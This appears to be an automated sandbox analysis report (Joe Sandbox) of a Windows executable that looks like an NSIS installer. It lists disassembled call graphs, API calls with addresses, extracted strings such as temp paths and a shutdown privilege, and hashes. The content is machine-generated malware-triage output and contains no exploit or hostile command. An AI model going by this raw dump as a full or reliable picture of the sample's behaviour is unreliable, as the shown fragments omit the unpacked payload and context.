3203->3201 3203->3202 3205 4063b4 3204->3205 3206 4063a9 FindClose 3204->3206 3205->3031 3206->3205 3208 403812 3207->3208 3209 403817 FreeLibrary GlobalFree 3208->3209 3210 4037dc 3208->3210 3209->3209 3209->3210 3211 405841 3210->3211 3212 405b0c 18 API calls 3211->3212 3213 405861 3212->3213 3214 405880 3213->3214 3215 405869 DeleteFileW 3213->3215 3217 4059ab 3214->3217 3250 406050 lstrcpynW 3214->3250 3216 4035f2 OleUninitialize 3215->3216 3216->2862 3216->2863 3217->3216 3224 406393 2 API calls 3217->3224 3219 4058a6 3220 4058b9 3219->3220 3221 4058ac lstrcatW 3219->3221 3223 405a50 2 API calls 3220->3223 3222 4058bf 3221->3222 3225 4058cf lstrcatW 3222->3225 3227 4058da lstrlenW FindFirstFileW 3222->3227 3223->3222 3226 4059c5 3224->3226 3225->3227 3226->3216 3228 4059c9 3226->3228 3230 4059a0 3227->3230 3248 4058fc 3227->3248 3229 405a04 3 API calls 3228->3229 3231 4059cf 3229->3231 3230->3217 3233 4057f9 5 API calls 3231->3233 3232 405983 FindNextFileW 3236 405999 FindClose 3232->3236 3232->3248 3235 4059db 3233->3235 3237 4059f5 3235->3237 3238 4059df 3235->3238 3236->3230 3240 4051af 25 API calls 3237->3240 3238->3216 3241 4051af 25 API calls 3238->3241 3240->3216 3243 4059ec 3241->3243 3242 405841 62 API calls 3242->3248 3244 405ef1 38 API calls 3243->3244 3246 4059f3 3244->3246 3245 4051af 25 API calls 3245->3232 3246->3216 3247 4051af 25 API calls 3247->3248 3248->3232 3248->3242 3248->3245 3248->3247 3249 405ef1 38 API calls 3248->3249 3251 406050 lstrcpynW 3248->3251 3252 4057f9 3248->3252 3249->3248 3250->3219 3251->3248 3260 405c00 GetFileAttributesW 3252->3260 3255 405814 RemoveDirectoryW 3257 405822 3255->3257 3256 40581c DeleteFileW 3256->3257 3258 405826 3257->3258 3259 405832 SetFileAttributesW 3257->3259 3258->3248 3259->3258 3261 405c12 SetFileAttributesW 3260->3261 3262 405805 3260->3262 3261->3262 3262->3255 3262->3256 3262->3258 3263->3062 3264->3062 3265->3061 3267 405da7 3266->3267 3268 405dcd GetShortPathNameW 3266->3268 3293 405c25 GetFileAttributesW CreateFileW 3267->3293 3270 405de2 3268->3270 3271 405eec 3268->3271 3270->3271 3273 405dea wsprintfA 3270->3273 3271->3078 3272 405db1 CloseHandle GetShortPathNameW 3272->3271 3274 405dc5 3272->3274 3275 406072 18 API calls 3273->3275 3274->3268 3274->3271 3276 405e12 3275->3276 3294 405c25 GetFileAttributesW CreateFileW 3276->3294 3278 405e1f 3278->3271 3279 405e2e GetFileSize GlobalAlloc 3278->3279 3280 405e50 3279->3280 3281 405ee5 CloseHandle 3279->3281 3282 405ca8 ReadFile 3280->3282 3281->3271 3283 405e58 3282->3283 3283->3281 3295 405b8a lstrlenA 3283->3295 3286 405e83 3288 405b8a 4 API calls 3286->3288 3287 405e6f lstrcpyA 3289 405e91 3287->3289 3288->3289 3290 405ec8 SetFilePointer 3289->3290 3291 405cd7 WriteFile 3290->3291 3292 405ede GlobalFree 3291->3292 3292->3281 3293->3272 3294->3278 3296 405bcb lstrlenA 3295->3296 3297 405bd3 3296->3297 3298 405ba4 lstrcmpiA 3296->3298 3297->3286 3297->3287 3298->3297 3299 405bc2 CharNextA 3298->3299 3299->3296 4019 405123 4020 405133 4019->4020 4021 405147 4019->4021 4022 405190 4020->4022 4023 405139 4020->4023 4024 40514f IsWindowVisible 4021->4024 4030 405166 4021->4030 4025 405195 CallWindowProcW 4022->4025 4026 404160 SendMessageW 4023->4026 4024->4022 4027 40515c 4024->4027 4028 405143 4025->4028 4026->4028 4032 404a79 SendMessageW 4027->4032 4030->4025 4037 404af9 4030->4037 4033 404ad8 SendMessageW 4032->4033 4034 404a9c GetMessagePos ScreenToClient SendMessageW 4032->4034 4035 404ad0 4033->4035 4034->4035 4036 404ad5 4034->4036 4035->4030 4036->4033 4046 406050 lstrcpynW 4037->4046 4039 404b0c 4047 405f97 wsprintfW 4039->4047 4041 404b16 4042 40140b 2 API calls 4041->4042 4043 404b1f 4042->4043 4048 406050 lstrcpynW 4043->4048 4045 404b26 4045->4022 4046->4039 4047->4041 4048->4045 4049 401ca3 4050 402ba2 18 API calls 4049->4050 4051 401ca9 IsWindow 4050->4051 4052 401a05 4051->4052 4053 402a27 SendMessageW 4054 402a41 InvalidateRect 4053->4054 4055 402a4c 4053->4055 4054->4055 4056 404228 lstrcpynW lstrlenW 4057 40242a 4058 402cc9 19 API calls 4057->4058 4059 402434 4058->4059 4060 402bbf 18 API calls 4059->4060 4061 40243d 4060->4061 4062 402448 RegQueryValueExW 4061->4062 4067 40281e 4061->4067 4063 40246e RegCloseKey 4062->4063 4064 402468 4062->4064 4063->4067 4064->4063 4068 405f97 wsprintfW 4064->4068 4068->4063 4069 404b2b GetDlgItem GetDlgItem 4070 404b7d 7 API calls 4069->4070 4078 404d96 4069->4078 4071 404c20 DeleteObject 4070->4071 4072 404c13 SendMessageW 4070->4072 4073 404c29 4071->4073 4072->4071 4075 404c60 4073->4075 4077 406072 18 API calls 4073->4077 4074 404e7a 4076 404f26 4074->4076 4080 404d89 4074->4080 4086 404ed3 SendMessageW 4074->4086 4079 404114 19 API calls 4075->4079 4081 404f30 SendMessageW 4076->4081 4082 404f38 4076->4082 4083 404c42 SendMessageW SendMessageW 4077->4083 4078->4074 4089 404a79 5 API calls 4078->4089 4101 404e07 4078->4101 4084 404c74 4079->4084 4087 40417b 8 API calls 4080->4087 4081->4082 4093 404f51 4082->4093 4094 404f4a ImageList_Destroy 4082->4094 4098 404f61 4082->4098 4083->4073 4085 404114 19 API calls 4084->4085 4102 404c82 4085->4102 4086->4080 4091 404ee8 SendMessageW 4086->4091 4092 40511c 4087->4092 4088 404e6c SendMessageW 4088->4074 4089->4101 4090 4050d0 4090->4080 4099 4050e2 ShowWindow GetDlgItem ShowWindow 4090->4099 4097 404efb 4091->4097 4095 404f5a GlobalFree 4093->4095 4093->4098 4094->4093 4095->4098 4096 404d57 GetWindowLongW SetWindowLongW 4100 404d70 4096->4100 4107 404f0c SendMessageW 4097->4107 4098->4090 4113 404af9 4 API calls 4098->4113 4114 404f9c 4098->4114 4099->4080 4103 404d76 ShowWindow 4100->4103 4104 404d8e 4100->4104 4101->4074 4101->4088 4102->4096 4106 404cd2 SendMessageW 4102->4106 4108 404d51 4102->4108 4111 404d0e SendMessageW 4102->4111 4112 404d1f SendMessageW 4102->4112 4120 404149 SendMessageW 4103->4120 4121 404149 SendMessageW 4104->4121 4106->4102 4107->4076 4108->4096 4108->4100 4109 404fe0 4115 4050a6 InvalidateRect 4109->4115 4119 405054 SendMessageW SendMessageW 4109->4119 4111->4102 4112->4102 4113->4114 4114->4109 4117 404fca SendMessageW 4114->4117 4115->4090 4116 4050bc 4115->4116 4122 404a34 4116->4122 4117->4109 4119->4109 4120->4080 4121->4078 4125 40496b 4122->4125 4124 404a49 4124->4090 4126 404984 4125->4126 4127 406072 18 API calls 4126->4127 4128 4049e8 4127->4128 4129 406072 18 API calls 4128->4129 4130 4049f3 4129->4130 4131 406072 18 API calls 4130->4131 4132 404a09 lstrlenW wsprintfW SetDlgItemTextW 4131->4132 4132->4124 4133 40172d 4134 402bbf 18 API calls 4133->4134 4135 401734 SearchPathW 4134->4135 4136 40174f 4135->4136 4137 4045af 4138 4045db 4137->4138 4139 4045ec 4137->4139 4198 405779 GetDlgItemTextW 4138->4198 4140 4045f8 GetDlgItem 4139->4140 4148 404657 4139->4148 4143 40460c 4140->4143 4142 4045e6 4145 4062e4 5 API calls 4142->4145 4146 404620 SetWindowTextW 4143->4146 4151 405aaf 4 API calls 4143->4151 4144 40473b 4147 4048ea 4144->4147 4200 405779 GetDlgItemTextW 4144->4200 4145->4139 4152 404114 19 API calls 4146->4152 4150 40417b 8 API calls 4147->4150 4148->4144 4148->4147 4153 406072 18 API calls 4148->4153 4155 4048fe 4150->4155 4156 404616 4151->4156 4157 40463c 4152->4157 4158 4046cb SHBrowseForFolderW 4153->4158 4154 40476b 4159 405b0c 18 API calls 4154->4159 4156->4146 4163 405a04 3 API calls 4156->4163 4160 404114 19 API calls 4157->4160 4158->4144 4161 4046e3 CoTaskMemFree 4158->4161 4162 404771 4159->4162 4164 40464a 4160->4164 4165 405a04 3 API calls 4161->4165 4201 406050 lstrcpynW 4162->4201 4163->4146 4199 404149 SendMessageW 4164->4199 4167 4046f0 4165->4167 4170 404727 SetDlgItemTextW 4167->4170 4174 406072 18 API calls 4167->4174 4169 404650 4172 40642a 5 API calls 4169->4172 4170->4144 4171 404788 4173 40642a 5 API calls 4171->4173 4172->4148 4181 40478f 4173->4181 4175 40470f lstrcmpiW 4174->4175 4175->4170 4177 404720 lstrcatW 4175->4177 4176 4047d0 4202 406050 lstrcpynW 4176->4202 4177->4170 4179 4047d7 4180 405aaf 4 API calls 4179->4180 4182 4047dd GetDiskFreeSpaceW 4180->4182 4181->4176 4185 405a50 2 API calls 4181->4185 4187 404828 4181->4187 4184 404801 MulDiv 4182->4184 4182->4187 4184->4187 4185->4181 4186 404899 4189 4048bc 4186->4189 4191 40140b 2 API calls 4186->4191 4187->4186 4188 404a34 21 API calls 4187->4188 4190 404886 4188->4190 4203 404136 KiUserCallbackDispatcher 4189->4203 4192 40489b SetDlgItemTextW 4190->4192 4193 40488b 4190->4193 4191->4189 4192->4186 4195 40496b 21 API calls 4193->4195 4195->4186 4196 4048d8 4196->4147 4204 404544 4196->4204 4198->4142 4199->4169 4200->4154 4201->4171 4202->4179 4203->4196 4205 404552 4204->4205 4206 404557 SendMessageW 4204->4206 4205->4206 4206->4147 4207 4042b1 4208 4042c9 4207->4208 4211 4043e3 4207->4211 4213 404114 19 API calls 4208->4213 4209 40444d 4210 404457 GetDlgItem 4209->4210 4212 40451f 4209->4212 4215 404471 4210->4215 4216 4044e0 4210->4216 4211->4209 4211->4212 4217 40441e GetDlgItem SendMessageW 4211->4217 4214 40417b 8 API calls 4212->4214 4218 404330 4213->4218 4220 40451a 4214->4220 4215->4216 4221 404497 6 API calls 4215->4221 4216->4212 4222 4044f2 4216->4222 4238 404136 KiUserCallbackDispatcher 4217->4238 4219 404114 19 API calls 4218->4219 4224 40433d CheckDlgButton 4219->4224 4221->4216 4225 404508 4222->4225 4226 4044f8 SendMessageW 4222->4226 4236 404136 KiUserCallbackDispatcher 4224->4236 4225->4220 4229 40450e SendMessageW 4225->4229 4226->4225 4227 404448 4230 404544 SendMessageW 4227->4230 4229->4220 4230->4209 4231 40435b GetDlgItem 4237 404149 SendMessageW 4231->4237 4233 404371 SendMessageW 4234 404397 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4233->4234 4235 40438e GetSysColor 4233->4235 4234->4220 4235->4234 4236->4231 4237->4233 4238->4227 4239 4027b4 4240 4027ba 4239->4240 4241 4027c2 FindClose 4240->4241 4242 402a4c 4240->4242 4241->4242 4243 401b37 4244 401b44 4243->4244 4245 401b88 4243->4245 4246 401bcd 4244->4246 4252 401b5b 4244->4252 4247 401bb2 GlobalAlloc 4245->4247 4248 401b8d 4245->4248 4249 406072 18 API calls 4246->4249 4259 402288 4246->4259 4250 406072 18 API calls 4247->4250 4248->4259 4264 406050 lstrcpynW 4248->4264 4251 402282 4249->4251 4250->4246 4257 405795 MessageBoxIndirectW 4251->4257 4262 406050 lstrcpynW 4252->4262 4255 401b9f GlobalFree 4255->4259 4256 401b6a 4263 406050 lstrcpynW 4256->4263 4257->4259 4260 401b79 4265 406050 lstrcpynW 4260->4265 4262->4256 4263->4260 4264->4255 4265->4259 4266 402537 4267 402562 4266->4267 4268 40254b 4266->4268 4270 402596 4267->4270 4271 402567 4267->4271 4269 402ba2 18 API calls 4268->4269 4278 402552 4269->4278 4273 402bbf 18 API calls 4270->4273 4272 402bbf 18 API calls 4271->4272 4275 40256e WideCharToMultiByte lstrlenA 4272->4275 4274 40259d lstrlenW 4273->4274 4274->4278 4275->4278 4276 4025ca 4277 4025e0 4276->4277 4279 405cd7 WriteFile 4276->4279 4278->4276 4278->4277 4280 405d06 5 API calls 4278->4280 4279->4277 4280->4276 4281 4014b8 4282 4014be 4281->4282 4283 401389 2 API calls 4282->4283 4284 4014c6 4283->4284 3473 4015b9 3474 402bbf 18 API calls 3473->3474 3475 4015c0 3474->3475 3476 405aaf 4 API calls 3475->3476 3488 4015c9 3476->3488 3477 401629 3479 40165b 3477->3479 3480 40162e 3477->3480 3478 405a31 CharNextW 3478->3488 3482 401423 25 API calls 3479->3482 3481 401423 25 API calls 3480->3481 3483 401635 3481->3483 3490 401653 3482->3490 3492 406050 lstrcpynW 3483->3492 3485 4056fb 2 API calls 3485->3488 3486 405718 5 API calls 3486->3488 3487 401642 SetCurrentDirectoryW 3487->3490 3488->3477 3488->3478 3488->3485 3488->3486 3489 40160f GetFileAttributesW 3488->3489 3491 40567e 4 API calls 3488->3491 3489->3488 3491->3488 3492->3487 4285 40293b 4286 402ba2 18 API calls 4285->4286 4287 402941 4286->4287 4288 402964 4287->4288 4289 40297d 4287->4289 4297 40281e 4287->4297 4294 402969 4288->4294 4295 40297a 4288->4295 4290 402993 4289->4290 4291 402987 4289->4291 4293 406072 18 API calls 4290->4293 4292 402ba2 18 API calls 4291->4292 4292->4297 4293->4297 4299 406050 lstrcpynW 4294->4299 4300 405f97 wsprintfW 4295->4300 4299->4297 4300->4297 3518 403c3c 3519 403c54 3518->3519 3520 403d8f 3518->3520 3519->3520 3521 403c60 3519->3521 3522 403da0 GetDlgItem GetDlgItem 3520->3522 3523 403de0 3520->3523 3526 403c6b SetWindowPos 3521->3526 3527 403c7e 3521->3527 3524 404114 19 API calls 3522->3524 3525 403e3a 3523->3525 3535 401389 2 API calls 3523->3535 3530 403dca SetClassLongW 3524->3530 3531 404160 SendMessageW 3525->3531 3536 403d8a 3525->3536 3526->3527 3528 403c83 ShowWindow 3527->3528 3529 403c9b 3527->3529 3528->3529 3532 403ca3 DestroyWindow 3529->3532 3533 403cbd 3529->3533 3534 40140b 2 API calls 3530->3534 3557 403e4c 3531->3557 3537 40409d 3532->3537 3538 403cc2 SetWindowLongW 3533->3538 3539 403cd3 3533->3539 3534->3523 3540 403e12 3535->3540 3537->3536 3549 4040ce ShowWindow 3537->3549 3538->3536 3542 403d7c 3539->3542 3543 403cdf GetDlgItem 3539->3543 3540->3525 3544 403e16 SendMessageW 3540->3544 3541 40409f DestroyWindow EndDialog 3541->3537 3548 40417b 8 API calls 3542->3548 3546 403cf2 SendMessageW IsWindowEnabled 3543->3546 3547 403d0f 3543->3547 3544->3536 3545 40140b 2 API calls 3545->3557 3546->3536 3546->3547 3551 403d1c 3547->3551 3554 403d63 SendMessageW 3547->3554 3555 403d2f 3547->3555 3562 403d14 3547->3562 3548->3536 3549->3536 3550 406072 18 API calls 3550->3557 3551->3554 3551->3562 3552 4040ed SendMessageW 3556 403d4a 3552->3556 3553 404114 19 API calls 3553->3557 3554->3542 3558 403d37 3555->3558 3559 403d4c 3555->3559 3556->3542 3557->3536 3557->3541 3557->3545 3557->3550 3557->3553 3564 404114 19 API calls 3557->3564 3579 403fdf DestroyWindow 3557->3579 3560 40140b 2 API calls 3558->3560 3561 40140b 2 API calls 3559->3561 3560->3562 3563 403d53 3561->3563 3562->3552 3563->3542 3563->3562 3565 403ec7 GetDlgItem 3564->3565 3566 403ee4 ShowWindow KiUserCallbackDispatcher 3565->3566 3567 403edc 3565->3567 3588 404136 KiUserCallbackDispatcher 3566->3588 3567->3566 3569 403f0e EnableWindow 3572 403f22 3569->3572 3570 403f27 GetSystemMenu EnableMenuItem SendMessageW 3571 403f57 SendMessageW 3570->3571 3570->3572 3571->3572 3572->3570 3589 404149 SendMessageW 3572->3589 3590 406050 lstrcpynW 3572->3590 3575 403f85 lstrlenW 3576 406072 18 API calls 3575->3576 3577 403f9b SetWindowTextW 3576->3577 3578 401389 2 API calls 3577->3578 3578->3557 3579->3537 3580 403ff9 CreateDialogParamW 3579->3580 3580->3537 3581 40402c 3580->3581 3582 404114 19 API calls 3581->3582 3583 404037 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3582->3583 3584 401389 2 API calls 3583->3584 3585 40407d 3584->3585 3585->3536 3586 404085 ShowWindow 3585->3586 3587 404160 SendMessageW 3586->3587 3587->3537 3588->3569 3589->3572 3590->3575

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 4032a0-4032d3 SetErrorMode GetVersion 1 4032d5-4032dd call 40642a 0->1 2 4032e6 0->2 1->2 7 4032df 1->7 4 4032eb-4032ff call 4063ba lstrlenA 2->4 9 403301-403375 call 40642a * 2 #17 OleInitialize SHGetFileInfoW call 406050 GetCommandLineW call 406050 GetModuleHandleW 4->9 7->2 18 403377-40337e 9->18 19 40337f-403399 call 405a31 CharNextW 9->19 18->19 22 4034b0-4034ca GetTempPathW call 40326f 19->22 23 40339f-4033a5 19->23 30 403522-40353c DeleteFileW call 402dee 22->30 31 4034cc-4034ea GetWindowsDirectoryW lstrcatW call 40326f 22->31 25 4033a7-4033ac 23->25 26 4033ae-4033b2 23->26 25->25 25->26 28 4033b4-4033b8 26->28 29 4033b9-4033bd 26->29 28->29 32 4033c3-4033c9 29->32 33 40347c-403489 call 405a31 29->33 51 403542-403548 30->51 52 4035ed-4035fd call 4037bf OleUninitialize 30->52 31->30 48 4034ec-40351c GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 31->48 37 4033e4-40341d 32->37 38 4033cb-4033d3 32->38 49 40348b-40348c 33->49 50 40348d-403493 33->50 41 40343a-403474 37->41 42 40341f-403424 37->42 39 4033d5-4033d8 38->39 40 4033da 38->40 39->37 39->40 40->37 41->33 47 403476-40347a 41->47 42->41 46 403426-40342e 42->46 54 403430-403433 46->54 55 403435 46->55 47->33 56 40349b-4034a9 call 406050 47->56 48->30 48->52 49->50 50->23 58 403499 50->58 59 4035dd-4035e4 call 403899 51->59 60 40354e-403559 call 405a31 51->60 69 403723-403729 52->69 70 403603-403613 call 405795 ExitProcess 52->70 54->41 54->55 55->41 66 4034ae 56->66 58->66 68 4035e9 59->68 71 4035a7-4035b1 60->71 72 40355b-403590 60->72 66->22 68->52 74 4037a7-4037af 69->74 75 40372b-403741 GetCurrentProcess OpenProcessToken 69->75 79 4035b3-4035c1 call 405b0c 71->79 80 403619-40362d call 405718 lstrcatW 71->80 76 403592-403596 72->76 77 4037b1 74->77 78 4037b5-4037b9 ExitProcess 74->78 82 403743-403771 LookupPrivilegeValueW AdjustTokenPrivileges 75->82 83 403777-403785 call 40642a 75->83 84 403598-40359d 76->84 85 40359f-4035a3 76->85 77->78 79->52 95 4035c3-4035d9 call 406050 * 2 79->95 96 40363a-403654 lstrcatW lstrcmpiW 80->96 97 40362f-403635 lstrcatW 80->97 82->83 93 403793-40379e ExitWindowsEx 83->93 94 403787-403791 83->94 84->85 89 4035a5 84->89 85->76 85->89 89->71 93->74 98 4037a0-4037a2 call 40140b 93->98 94->93 94->98 95->59 96->52 100 403656-403659 96->100 97->96 98->74 104 403662 call 4056fb 100->104 105 40365b-403660 call 40567e 100->105 110 403667-403675 SetCurrentDirectoryW 104->110 105->110 112 403682-4036ab call 406050 110->112 113 403677-40367d call 406050 110->113 117 4036b0-4036cc call 406072 DeleteFileW 112->117 113->112 120 40370d-403715 117->120 121 4036ce-4036de CopyFileW 117->121 120->117 122 403717-40371e call 405ef1 120->122 121->120 123 4036e0-403700 call 405ef1 call 406072 call 405730 121->123 122->52 123->120 132 403702-403709 CloseHandle 123->132 132->120
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE ref: 004032C3
                                                                                                                                • GetVersion.KERNEL32 ref: 004032C9
                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
                                                                                                                                • #17.COMCTL32(00000007,00000009), ref: 00403315
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040331C
                                                                                                                                • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
                                                                                                                                • GetCommandLineW.KERNEL32(Windowlet Setup,NSIS Error), ref: 0040334D
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000), ref: 00403360
                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000020), ref: 00403387
                                                                                                                                  • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                  • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
                                                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 00403527
                                                                                                                                  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Windowlet Setup,NSIS Error), ref: 0040605D
                                                                                                                                • OleUninitialize.OLE32(?), ref: 004035F2
                                                                                                                                • ExitProcess.KERNEL32 ref: 00403613
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000,?), ref: 00403626
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000,?), ref: 00403635
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000,?), ref: 00403640
                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000,?), ref: 0040364C
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
                                                                                                                                • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\4Vx2rUlb0f.exe,0042AA08,00000001), ref: 004036D6
                                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403739
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403771
                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
                                                                                                                                • ExitProcess.KERNEL32 ref: 004037B9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                • String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer$C:\Users\user\Desktop$C:\Users\user\Desktop\4Vx2rUlb0f.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Windowlet Setup$\Temp$~nsu
                                                                                                                                • API String ID: 2488574733-3340326761
                                                                                                                                • Opcode ID: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
                                                                                                                                • Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
                                                                                                                                • Opcode Fuzzy Hash: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
                                                                                                                                • Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 133 4052ee-405309 134 405498-40549f 133->134 135 40530f-4053d6 GetDlgItem * 3 call 404149 call 404a4c GetClientRect GetSystemMetrics SendMessageW * 2 133->135 137 4054a1-4054c3 GetDlgItem CreateThread CloseHandle 134->137 138 4054c9-4054d6 134->138 155 4053f4-4053f7 135->155 156 4053d8-4053f2 SendMessageW * 2 135->156 137->138 140 4054f4-4054fe 138->140 141 4054d8-4054de 138->141 145 405500-405506 140->145 146 405554-405558 140->146 143 4054e0-4054ef ShowWindow * 2 call 404149 141->143 144 405519-405522 call 40417b 141->144 143->140 159 405527-40552b 144->159 150 405508-405514 call 4040ed 145->150 151 40552e-40553e ShowWindow 145->151 146->144 148 40555a-405560 146->148 148->144 157 405562-405575 SendMessageW 148->157 150->144 153 405540-405549 call 4051af 151->153 154 40554e-40554f call 4040ed 151->154 153->154 154->146 162 405407-40541e call 404114 155->162 163 4053f9-405405 SendMessageW 155->163 156->155 164 405677-405679 157->164 165 40557b-4055a6 CreatePopupMenu call 406072 AppendMenuW 157->165 172 405420-405434 ShowWindow 162->172 173 405454-405475 GetDlgItem SendMessageW 162->173 163->162 164->159 170 4055a8-4055b8 GetWindowRect 165->170 171 4055bb-4055d0 TrackPopupMenu 165->171 170->171 171->164 175 4055d6-4055ed 171->175 176 405443 172->176 177 405436-405441 ShowWindow 172->177 173->164 174 40547b-405493 SendMessageW * 2 173->174 174->164 178 4055f2-40560d SendMessageW 175->178 179 405449-40544f call 404149 176->179 177->179 178->178 180 40560f-405632 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->173 182 405634-40565b SendMessageW 180->182 182->182 183 40565d-405671 GlobalUnlock SetClipboardData CloseClipboard 182->183 183->164
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040534C
                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040535B
                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405398
                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040539F
                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040543B
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040545C
                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
